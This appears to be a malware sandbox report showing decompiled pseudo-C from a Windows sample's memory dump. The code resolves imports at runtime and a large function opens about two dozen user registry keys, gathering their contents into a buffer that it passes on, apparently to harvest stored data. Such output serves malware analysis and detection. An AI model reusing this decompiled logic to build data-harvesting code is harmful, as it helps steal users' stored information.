				_t8 = LoadLibraryA( *0x613174); // executed
				 *0x6136b4 = _t8;
				_t9 =  *0x6136e8; // 0x76130000
				if(_t9 != 0) {
					 *0x61362c = GetProcAddress(_t9,  *0x6131b4);
					 *0x613614 = GetProcAddress( *0x6136e8,  *0x613448);
					 *0x6135fc = GetProcAddress( *0x6136e8,  *0x6131f4);
					 *0x613770 = GetProcAddress( *0x6136e8,  *0x613428);
					 *0x6136b0 = GetProcAddress( *0x6136e8,  *0x613518);
				}
				_t10 =  *0x6136a4; // 0x6f1c0000
				if(_t10 != 0) {
					 *0x613650 = GetProcAddress(_t10,  *0x6132cc);
					 *0x613694 = GetProcAddress( *0x6136a4,  *0x6131c8);
					 *0x613738 = GetProcAddress( *0x6136a4,  *0x613224);
					 *0x613768 = GetProcAddress( *0x6136a4,  *0x6130f4);
					 *0x613750 = GetProcAddress( *0x6136a4,  *0x613384);
					 *0x613708 = GetProcAddress( *0x6136a4,  *0x613540);
					 *0x613668 = GetProcAddress( *0x6136a4,  *0x613290);
					 *0x6137b0 = GetProcAddress( *0x6136a4,  *0x613538);
				}
				_t11 =  *0x6136dc; // 0x75ec0000
				if(_t11 != 0) {
					 *0x613604 = GetProcAddress(_t11,  *0x6132d4);
					 *0x6136ec = GetProcAddress( *0x6136dc,  *0x61310c);
					 *0x613764 = GetProcAddress( *0x6136dc,  *0x613230);
					 *0x61377c = GetProcAddress( *0x6136dc,  *0x6134fc);
					 *0x613648 = GetProcAddress( *0x6136dc,  *0x613374);
				}
				_t12 =  *0x61376c; // 0x731b0000
				if(_t12 != 0) {
					 *0x613630 = GetProcAddress(_t12,  *0x6133a8);
					 *0x6136c4 = GetProcAddress( *0x61376c,  *0x6130b8);
					 *0x613794 = GetProcAddress( *0x61376c,  *0x61306c);
					 *0x613654 = GetProcAddress( *0x61376c,  *0x613264);
					 *0x613758 = GetProcAddress( *0x61376c,  *0x6134e0);
					 *0x613674 = GetProcAddress( *0x61376c,  *0x613398);
				}
				_t13 =  *0x6137cc; // 0x762b0000
				if(_t13 != 0) {
					 *0x6137e0 = GetProcAddress(_t13,  *0x61328c);
					 *0x6135f8 = GetProcAddress( *0x6137cc,  *0x613440);
					 *0x6137c8 = GetProcAddress( *0x6137cc,  *0x613460);
					 *0x6137bc = GetProcAddress( *0x6137cc,  *0x613294);
					 *0x6135f4 = GetProcAddress( *0x6137cc,  *0x61322c);
					 *0x613740 = GetProcAddress( *0x6137cc,  *0x6133a4);
					 *0x613734 = GetProcAddress( *0x6137cc,  *0x613438);
					 *0x6136fc = GetProcAddress( *0x6137cc,  *0x61345c);
				}
				_t14 =  *0x6135dc; // 0x76170000
				if(_t14 != 0) {
					 *0x613690 = GetProcAddress(_t14,  *0x6133bc);
					 *0x6137a0 = GetProcAddress( *0x6135dc,  *0x61316c);
					 *0x6136a8 = GetProcAddress( *0x6135dc,  *0x6134b0);
					 *0x613718 = GetProcAddress( *0x6135dc,  *0x613118);
					 *0x6137dc = GetProcAddress( *0x6135dc,  *0x613554);
				}
				_t15 =  *0x6136a0; // 0x76b00000
				if(_t15 != 0) {
					 *0x6135e0 = GetProcAddress(_t15,  *0x6130e0);
					 *0x61368c = GetProcAddress( *0x6136a0,  *0x613254);
				}
				_t16 =  *0x6137c0; // 0x73970000
				if(_t16 != 0) {
					 *0x613744 = GetProcAddress(_t16,  *0x6131b0);
					 *0x6137b4 = GetProcAddress( *0x6137c0,  *0x613284);
				}
				_t17 =  *0x61364c; // 0x6e9f0000
				if(_t17 != 0) {
					 *0x6136c0 = GetProcAddress(_t17,  *0x6131ac);
					 *0x6137a8 = GetProcAddress( *0x61364c,  *0x613198);
					 *0x6136b8 = GetProcAddress( *0x61364c,  *0x613190);
					 *0x6136bc = GetProcAddress( *0x61364c,  *0x613354);
					 *0x613774 = GetProcAddress( *0x61364c,  *0x6133cc);
					 *0x6137d8 = GetProcAddress( *0x61364c,  *0x6133b0);
					 *0x6136e0 = GetProcAddress( *0x61364c,  *0x6133d0);
					 *0x613664 = GetProcAddress( *0x61364c,  *0x6134d8);
				}
				_t18 =  *0x6136d0; // 0x76cd0000
				if(_t18 != 0) {
					 *0x613784 = GetProcAddress(_t18,  *0x613114);
					 *0x613618 = GetProcAddress( *0x6136d0,  *0x613490);
					 *0x61372c = GetProcAddress( *0x6136d0,  *0x613194);
					 *0x613680 = GetProcAddress( *0x6136d0,  *0x61309c);
				}
				_t19 =  *0x6136b4; // 0x75750000
				if(_t19 != 0) {
					_t20 = GetProcAddress(_t19,  *0x6132a4);
					 *0x613780 = _t20;
					return _t20;
				}
				return _t19;
			}

0x0040e10b
0x0040e112
0x0040e12b
0x0040e142
0x0040e159
0x0040e170
0x0040e187
0x0040e19e
0x0040e1b5
0x0040e1cc
0x0040e1e3
0x0040e1fa
0x0040e211
0x0040e228
0x0040e23f
0x0040e256
0x0040e26d
0x0040e284
0x0040e29b
0x0040e2b2
0x0040e2c9
0x0040e2e0
0x0040e2f7
0x0040e30e
0x0040e325
0x0040e33c
0x0040e353
0x0040e36a
0x0040e381
0x0040e398
0x0040e3af
0x0040e3c6
0x0040e3dd
0x0040e3f4
0x0040e40b
0x0040e422
0x0040e439
0x0040e450
0x0040e467
0x0040e47e
0x0040e495
0x0040e4ac
0x0040e4bd
0x0040e4bd
0x0040e4c8
0x0040e4d4
0x0040e4d9
0x0040e4e5
0x0040e4ea
0x0040e4f6
0x0040e4fb
0x0040e507
0x0040e50c
0x0040e518
0x0040e51d
0x0040e529
0x0040e52e
0x0040e534
0x0040e539
0x0040e540
0x0040e555
0x0040e56c
0x0040e583
0x0040e59a
0x0040e5ab
0x0040e5ab
0x0040e5b0
0x0040e5b7
0x0040e5d0
0x0040e5e7
0x0040e5fe
0x0040e615
0x0040e62c
0x0040e643
0x0040e65a
0x0040e66b
0x0040e66b
0x0040e670
0x0040e677
0x0040e68c
0x0040e6a3
0x0040e6ba
0x0040e6d1
0x0040e6e2
0x0040e6e2
0x0040e6e7
0x0040e6ee
0x0040e707
0x0040e71e
0x0040e735
0x0040e74c
0x0040e763
0x0040e774
0x0040e774
0x0040e779
0x0040e780
0x0040e799
0x0040e7b0
0x0040e7c7
0x0040e7de
0x0040e7f5
0x0040e80c
0x0040e823
0x0040e834
0x0040e834
0x0040e839
0x0040e840
0x0040e855
0x0040e86c
0x0040e883
0x0040e89a
0x0040e8ab
0x0040e8ab
0x0040e8b0
0x0040e8b7
0x0040e8cc
0x0040e8dd
0x0040e8dd
0x0040e8e2
0x0040e8e9
0x0040e8fe
0x0040e90f
0x0040e90f
0x0040e914
0x0040e91b
0x0040e934
0x0040e94b
0x0040e962
0x0040e979
0x0040e990
0x0040e9a7
0x0040e9be
0x0040e9cf
0x0040e9cf
0x0040e9d4
0x0040e9db
0x0040e9f0
0x0040ea07
0x0040ea1e
0x0040ea2f
0x0040ea2f
0x0040ea34
0x0040ea3b
0x0040ea44
0x0040ea4a
0x00000000
0x0040ea4a
0x0040ea4f

APIs

GetProcAddress.KERNEL32(76670000,0040C93B), ref: 0040E11F
GetProcAddress.KERNEL32 ref: 0040E136
GetProcAddress.KERNEL32 ref: 0040E14D
GetProcAddress.KERNEL32 ref: 0040E164
GetProcAddress.KERNEL32 ref: 0040E17B
GetProcAddress.KERNEL32 ref: 0040E192
GetProcAddress.KERNEL32 ref: 0040E1A9
GetProcAddress.KERNEL32 ref: 0040E1C0
GetProcAddress.KERNEL32 ref: 0040E1D7
GetProcAddress.KERNEL32 ref: 0040E1EE
GetProcAddress.KERNEL32 ref: 0040E205
GetProcAddress.KERNEL32 ref: 0040E21C
GetProcAddress.KERNEL32 ref: 0040E233
GetProcAddress.KERNEL32 ref: 0040E24A
GetProcAddress.KERNEL32 ref: 0040E261
GetProcAddress.KERNEL32 ref: 0040E278
GetProcAddress.KERNEL32 ref: 0040E28F
GetProcAddress.KERNEL32 ref: 0040E2A6
GetProcAddress.KERNEL32 ref: 0040E2BD
GetProcAddress.KERNEL32 ref: 0040E2D4
GetProcAddress.KERNEL32 ref: 0040E2EB
GetProcAddress.KERNEL32 ref: 0040E302
GetProcAddress.KERNEL32 ref: 0040E319
GetProcAddress.KERNEL32 ref: 0040E330
GetProcAddress.KERNEL32 ref: 0040E347
GetProcAddress.KERNEL32 ref: 0040E35E
GetProcAddress.KERNEL32 ref: 0040E375
GetProcAddress.KERNEL32 ref: 0040E38C
GetProcAddress.KERNEL32 ref: 0040E3A3
GetProcAddress.KERNEL32 ref: 0040E3BA
GetProcAddress.KERNEL32 ref: 0040E3D1
GetProcAddress.KERNEL32 ref: 0040E3E8
GetProcAddress.KERNEL32 ref: 0040E3FF
GetProcAddress.KERNEL32 ref: 0040E416
GetProcAddress.KERNEL32 ref: 0040E42D
GetProcAddress.KERNEL32 ref: 0040E444
GetProcAddress.KERNEL32 ref: 0040E45B
GetProcAddress.KERNEL32 ref: 0040E472
GetProcAddress.KERNEL32 ref: 0040E489
GetProcAddress.KERNEL32 ref: 0040E4A0
GetProcAddress.KERNEL32 ref: 0040E4B7
LoadLibraryA.KERNEL32(0040C93B), ref: 0040E4C8
LoadLibraryA.KERNEL32 ref: 0040E4D9
LoadLibraryA.KERNEL32 ref: 0040E4EA
LoadLibraryA.KERNEL32 ref: 0040E4FB
LoadLibraryA.KERNEL32 ref: 0040E50C
LoadLibraryA.KERNEL32 ref: 0040E51D
LoadLibraryA.KERNEL32 ref: 0040E52E
GetProcAddress.KERNEL32(76130000), ref: 0040E549
GetProcAddress.KERNEL32 ref: 0040E560
GetProcAddress.KERNEL32 ref: 0040E577
GetProcAddress.KERNEL32 ref: 0040E58E
GetProcAddress.KERNEL32 ref: 0040E5A5
GetProcAddress.KERNEL32(6F1C0000), ref: 0040E5C4
GetProcAddress.KERNEL32 ref: 0040E5DB
GetProcAddress.KERNEL32 ref: 0040E5F2
GetProcAddress.KERNEL32 ref: 0040E609
GetProcAddress.KERNEL32 ref: 0040E620
GetProcAddress.KERNEL32 ref: 0040E637
GetProcAddress.KERNEL32 ref: 0040E64E
GetProcAddress.KERNEL32 ref: 0040E665
GetProcAddress.KERNEL32(75EC0000), ref: 0040E680
GetProcAddress.KERNEL32 ref: 0040E697
GetProcAddress.KERNEL32 ref: 0040E6AE
GetProcAddress.KERNEL32 ref: 0040E6C5
GetProcAddress.KERNEL32 ref: 0040E6DC
GetProcAddress.KERNEL32(731B0000), ref: 0040E6FB
GetProcAddress.KERNEL32 ref: 0040E712
GetProcAddress.KERNEL32 ref: 0040E729
GetProcAddress.KERNEL32 ref: 0040E740
GetProcAddress.KERNEL32 ref: 0040E757
GetProcAddress.KERNEL32 ref: 0040E76E
GetProcAddress.KERNEL32(762B0000), ref: 0040E78D
GetProcAddress.KERNEL32 ref: 0040E7A4
GetProcAddress.KERNEL32 ref: 0040E7BB
GetProcAddress.KERNEL32 ref: 0040E7D2
GetProcAddress.KERNEL32 ref: 0040E7E9
GetProcAddress.KERNEL32 ref: 0040E800
GetProcAddress.KERNEL32 ref: 0040E817
GetProcAddress.KERNEL32 ref: 0040E82E
GetProcAddress.KERNEL32(76170000), ref: 0040E849
GetProcAddress.KERNEL32 ref: 0040E860
GetProcAddress.KERNEL32 ref: 0040E877
GetProcAddress.KERNEL32 ref: 0040E88E
GetProcAddress.KERNEL32 ref: 0040E8A5
GetProcAddress.KERNEL32(76B00000), ref: 0040E8C0
GetProcAddress.KERNEL32 ref: 0040E8D7
GetProcAddress.KERNEL32(73970000), ref: 0040E8F2
GetProcAddress.KERNEL32 ref: 0040E909
GetProcAddress.KERNEL32(6E9F0000), ref: 0040E928
GetProcAddress.KERNEL32 ref: 0040E93F
GetProcAddress.KERNEL32 ref: 0040E956
GetProcAddress.KERNEL32 ref: 0040E96D
GetProcAddress.KERNEL32 ref: 0040E984
GetProcAddress.KERNEL32 ref: 0040E99B
GetProcAddress.KERNEL32 ref: 0040E9B2
GetProcAddress.KERNEL32 ref: 0040E9C9
GetProcAddress.KERNEL32(76CD0000), ref: 0040E9E4
GetProcAddress.KERNEL32 ref: 0040E9FB
GetProcAddress.KERNEL32 ref: 0040EA12
GetProcAddress.KERNEL32 ref: 0040EA29
GetProcAddress.KERNEL32(75750000), ref: 0040EA44

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 17fe2f60e7317605470704d6490431095424c6165678c8f9109c6ea5d99ea33e
Instruction ID: cfac3a356e782c6d042a656422617b8db80429f7197ddbebba49d56708ee88c6
Opcode Fuzzy Hash: 17fe2f60e7317605470704d6490431095424c6165678c8f9109c6ea5d99ea33e
Instruction Fuzzy Hash: DC32C4B5602261FFDB029F61FD098E47EA7F718711318F127A94B92370D7324AA1AF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB17 Relevance: 118.0, APIs: 78, Instructions: 966
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0040BB17(char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v276;
				char _v288;
				char _v1288;
				char _v2288;
				char _v3288;
				char _v4288;
				char _v5288;
				char _v6288;
				char _v7288;
				char _v8288;
				char _v9288;
				char _v10288;
				char _v11288;
				char _v12288;
				char _v13288;
				char _v14288;
				char _v15288;
				char _v16288;
				char _v17288;
				char _v18288;
				char _v19288;
				char _v20288;
				char _v21288;
				char _v22288;
				char _v23288;
				char _v24288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t397;
				long _t586;
				long _t589;
				long _t592;
				long _t595;
				long _t598;
				long _t601;
				long _t604;
				long _t607;
				long _t610;
				long _t613;
				long _t616;
				long _t619;
				long _t622;
				long _t625;
				long _t628;
				long _t631;
				long _t634;
				long _t637;
				long _t640;
				long _t643;
				long _t646;
				long _t649;
				long _t652;
				long _t655;
				void* _t663;
				void* _t1044;
				void* _t1068;
				void* _t1069;
				void* _t1094;
				void* _t1095;

				E0040EBE0(0x5edc);
				_t397 = RtlAllocateHeap(GetProcessHeap(), 0, 0x98967f); // executed
				_v16 = _t397;
				_v8 =  &_v3288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v16288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v20288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v19288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v2288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v24288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v17288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v15288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v5288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v10288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v22288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v9288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v4288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v11288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v13288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v8288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v1288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v7288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v23288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v14288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v6288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v18288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v21288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v12288;
				memset(_v8, 0, 0x3e8 << 0);
				_t1068 = _t1044 + 0x120;
				 *0x61375c( &_v3288,  *0x613504);
				 *0x61375c( &_v16288,  &_v3288);
				 *0x61375c( &_v20288,  &_v3288);
				 *0x61375c( &_v19288,  &_v3288);
				 *0x61375c( &_v3288,  *0x613310);
				 *0x61375c( &_v16288,  *0x6130e8);
				 *0x61375c( &_v20288,  *0x613068);
				 *0x61375c( &_v19288,  *0x613110);
				 *0x61375c( &_v2288,  *0x613064);
				 *0x61375c( &_v24288,  &_v2288);
				 *0x61375c( &_v17288,  &_v2288);
				 *0x61375c( &_v15288,  &_v2288);
				 *0x61375c( &_v2288,  *0x613310);
				 *0x61375c( &_v24288,  *0x6130e8);
				 *0x61375c( &_v17288,  *0x613068);
				 *0x61375c( &_v15288,  *0x613110);
				 *0x61375c( &_v5288,  *0x613188);
				 *0x61375c( &_v10288,  &_v5288);
				 *0x61375c( &_v22288,  &_v5288);
				 *0x61375c( &_v9288,  &_v5288);
				 *0x61375c( &_v5288,  *0x613310);
				 *0x61375c( &_v10288,  *0x6130e8);
				 *0x61375c( &_v22288,  *0x613068);
				 *0x61375c( &_v9288,  *0x613110);
				 *0x61375c( &_v4288,  *0x6132bc);
				 *0x61375c( &_v11288,  &_v4288);
				 *0x61375c( &_v13288,  &_v4288);
				 *0x61375c( &_v8288,  &_v4288);
				 *0x61375c( &_v4288,  *0x613310);
				 *0x61375c( &_v11288,  *0x6130e8);
				 *0x61375c( &_v13288,  *0x613068);
				 *0x61375c( &_v8288,  *0x613110);
				 *0x61375c( &_v1288,  *0x613154);
				 *0x61375c( &_v7288,  &_v1288);
				 *0x61375c( &_v23288,  &_v1288);
				 *0x61375c( &_v14288,  &_v1288);
				 *0x61375c( &_v1288,  *0x613310);
				 *0x61375c( &_v7288,  *0x6130e8);
				 *0x61375c( &_v23288,  *0x613068);
				 *0x61375c( &_v14288,  *0x613110);
				 *0x61375c( &_v6288,  *0x6134a8);
				 *0x61375c( &_v18288,  &_v6288);
				 *0x61375c( &_v21288,  &_v6288);
				 *0x61375c( &_v12288,  &_v6288);
				 *0x61375c( &_v6288,  *0x613310);
				 *0x61375c( &_v18288,  *0x6130e8);
				 *0x61375c( &_v21288,  *0x613068);
				 *0x61375c( &_v12288,  *0x613110);
				_v12 = 0x80000001;
				_t586 = RegOpenKeyExA(0x80000001,  &_v3288, 0, 0x20019,  &_v12); // executed
				if(_t586 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t589 = RegOpenKeyExA(0x80000001,  &_v16288, 0, 0x20019,  &_v8); // executed
				if(_t589 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t592 = RegOpenKeyExA(0x80000001,  &_v20288, 0, 0x20019,  &_v12); // executed
				if(_t592 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t595 = RegOpenKeyExA(0x80000001,  &_v19288, 0, 0x20019,  &_v8); // executed
				if(_t595 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t598 = RegOpenKeyExA(0x80000001,  &_v2288, 0, 0x20019,  &_v12); // executed
				if(_t598 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t601 = RegOpenKeyExA(0x80000001,  &_v24288, 0, 0x20019,  &_v8); // executed
				if(_t601 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t604 = RegOpenKeyExA(0x80000001,  &_v17288, 0, 0x20019,  &_v12); // executed
				if(_t604 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t607 = RegOpenKeyExA(0x80000001,  &_v15288, 0, 0x20019,  &_v8); // executed
				if(_t607 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t610 = RegOpenKeyExA(0x80000001,  &_v5288, 0, 0x20019,  &_v12); // executed
				if(_t610 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t613 = RegOpenKeyExA(0x80000001,  &_v10288, 0, 0x20019,  &_v8); // executed
				if(_t613 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t616 = RegOpenKeyExA(0x80000001,  &_v22288, 0, 0x20019,  &_v12); // executed
				if(_t616 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t619 = RegOpenKeyExA(0x80000001,  &_v9288, 0, 0x20019,  &_v8); // executed
				if(_t619 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t622 = RegOpenKeyExA(0x80000001,  &_v4288, 0, 0x20019,  &_v12); // executed
				if(_t622 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t625 = RegOpenKeyExA(0x80000001,  &_v11288, 0, 0x20019,  &_v8); // executed
				if(_t625 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t628 = RegOpenKeyExA(0x80000001,  &_v13288, 0, 0x20019,  &_v12); // executed
				if(_t628 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t631 = RegOpenKeyExA(0x80000001,  &_v8288, 0, 0x20019,  &_v8); // executed
				if(_t631 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t634 = RegOpenKeyExA(0x80000001,  &_v1288, 0, 0x20019,  &_v12); // executed
				if(_t634 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t637 = RegOpenKeyExA(0x80000001,  &_v7288, 0, 0x20019,  &_v8); // executed
				if(_t637 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t640 = RegOpenKeyExA(0x80000001,  &_v23288, 0, 0x20019,  &_v12); // executed
				if(_t640 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t643 = RegOpenKeyExA(0x80000001,  &_v14288, 0, 0x20019,  &_v8); // executed
				if(_t643 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t646 = RegOpenKeyExA(0x80000001,  &_v6288, 0, 0x20019,  &_v12); // executed
				if(_t646 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t649 = RegOpenKeyExA(0x80000001,  &_v18288, 0, 0x20019,  &_v8); // executed
				if(_t649 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 = 0x80000001;
				_t652 = RegOpenKeyExA(0x80000001,  &_v21288, 0, 0x20019,  &_v12); // executed
				if(_t652 == 0) {
					E0040B967(_v16,  &_v12);
				}
				_v8 = 0x80000001;
				_t655 = RegOpenKeyExA(0x80000001,  &_v12288, 0, 0x20019,  &_v8); // executed
				if(_t655 == 0) {
					E0040B967(_v16,  &_v8);
				}
				_v12 =  &_v276;
				memset(_v12, 0, 0x104 << 0);
				_t1069 = _t1068 + 0xc;
				 *0x61375c( &_v276,  *0x613454);
				 *0x61375c( &_v276,  *0x6130c4);
				_t663 =  *0x61367c(_v16);
				_t1120 = _t663;
				if(_t663 > 0) {
					_push( *0x61367c(_v16));
					_push(_v16);
					_t1094 = _t1069 - 0xc;
					E0040EA50(_t1094, _t1120,  &_v276);
					_t1095 = _t1094 - 0x50;
					E00401581( &_a4, _t1095);
					_push( &_v288);
					E00403721(0, _t1120);
					_t1069 = _t1095 + 0x68;
					E004016EF(_v288);
				}
				_v8 =  &_v3288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v16288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v20288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v19288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v2288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v24288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v17288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v15288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v5288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v10288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v22288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v9288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v4288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v11288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v13288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v8288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v1288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v7288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v23288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v14288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v6288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v18288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v21288;
				memset(_v8, 0, 0x3e8 << 0);
				_v8 =  &_v12288;
				memset(_v8, 0, 0x3e8 << 0);
				return E00401562( &_a4);
			}

0x0040bb1f
0x0040bb36
0x0040bb3c
0x0040bb45
0x0040bb52
0x0040bb5a
0x0040bb67
0x0040bb6f
0x0040bb7c
0x0040bb84
0x0040bb91
0x0040bb99
0x0040bba6
0x0040bbae
0x0040bbbb
0x0040bbc3
0x0040bbd0
0x0040bbd8
0x0040bbe5
0x0040bbed
0x0040bbfa
0x0040bc02
0x0040bc0f
0x0040bc17
0x0040bc24
0x0040bc2c
0x0040bc39
0x0040bc41
0x0040bc4e
0x0040bc56
0x0040bc63
0x0040bc6b
0x0040bc78
0x0040bc80
0x0040bc8d
0x0040bc95
0x0040bca2
0x0040bcaa
0x0040bcb7
0x0040bcbf
0x0040bccc
0x0040bcd4
0x0040bce1
0x0040bce9
0x0040bcf6
0x0040bcfe
0x0040bd0b
0x0040bd13
0x0040bd20
0x0040bd28
0x0040bd35
0x0040bd35
0x0040bd44
0x0040bd58
0x0040bd6c
0x0040bd80
0x0040bd93
0x0040bda6
0x0040bdb9
0x0040bdcc
0x0040bddf
0x0040bdf3
0x0040be07
0x0040be1b
0x0040be2e
0x0040be41
0x0040be54
0x0040be67
0x0040be7a
0x0040be8e
0x0040bea2
0x0040beb6
0x0040bec9
0x0040bedc
0x0040beef
0x0040bf02
0x0040bf15
0x0040bf29
0x0040bf3d
0x0040bf51
0x0040bf64
0x0040bf77
0x0040bf8a
0x0040bf9d
0x0040bfb0
0x0040bfc4
0x0040bfd8
0x0040bfec
0x0040bfff
0x0040c012
0x0040c025
0x0040c038
0x0040c04b
0x0040c05f
0x0040c073
0x0040c087
0x0040c09a
0x0040c0ad
0x0040c0c0
0x0040c0d3
0x0040c0f1
0x0040c0f4
0x0040c0fc
0x0040c105
0x0040c10b
0x0040c11a
0x0040c11d
0x0040c125
0x0040c12e
0x0040c134
0x0040c143
0x0040c146
0x0040c14e
0x0040c157
0x0040c15d
0x0040c16c
0x0040c16f
0x0040c177
0x0040c180
0x0040c186
0x0040c195
0x0040c198
0x0040c1a0
0x0040c1a9
0x0040c1af
0x0040c1be
0x0040c1c1
0x0040c1c9
0x0040c1d2
0x0040c1d8
0x0040c1e7
0x0040c1ea
0x0040c1f2
0x0040c1fb
0x0040c201
0x0040c210
0x0040c213
0x0040c21b
0x0040c224
0x0040c22a
0x0040c239
0x0040c23c
0x0040c244
0x0040c24d
0x0040c253
0x0040c262
0x0040c265
0x0040c26d
0x0040c276
0x0040c27c
0x0040c28b
0x0040c28e
0x0040c296
0x0040c29f
0x0040c2a5
0x0040c2b4
0x0040c2b7
0x0040c2bf
0x0040c2c8
0x0040c2ce
0x0040c2dd
0x0040c2e0
0x0040c2e8
0x0040c2f1
0x0040c2f7
0x0040c306
0x0040c309
0x0040c311
0x0040c31a
0x0040c320
0x0040c32f
0x0040c332
0x0040c33a
0x0040c343
0x0040c349
0x0040c358
0x0040c35b
0x0040c363
0x0040c36c
0x0040c372
0x0040c381
0x0040c384
0x0040c38c
0x0040c395
0x0040c39b
0x0040c3aa
0x0040c3ad
0x0040c3b5
0x0040c3be
0x0040c3c4
0x0040c3d3
0x0040c3d6
0x0040c3de
0x0040c3e7
0x0040c3ed
0x0040c3fc
0x0040c3ff
0x0040c407
0x0040c410
0x0040c416
0x0040c425
0x0040c428
0x0040c430
0x0040c439
0x0040c43f
0x0040c44e
0x0040c451
0x0040c459
0x0040c462
0x0040c468
0x0040c477
0x0040c47a
0x0040c482
0x0040c48b
0x0040c491
0x0040c4a0
0x0040c4a3
0x0040c4ab
0x0040c4b4
0x0040c4ba
0x0040c4c1
0x0040c4ce
0x0040c4ce
0x0040c4dd
0x0040c4f0
0x0040c4f9
0x0040c4ff
0x0040c501
0x0040c50c
0x0040c50d
0x0040c516
0x0040c51c
0x0040c521
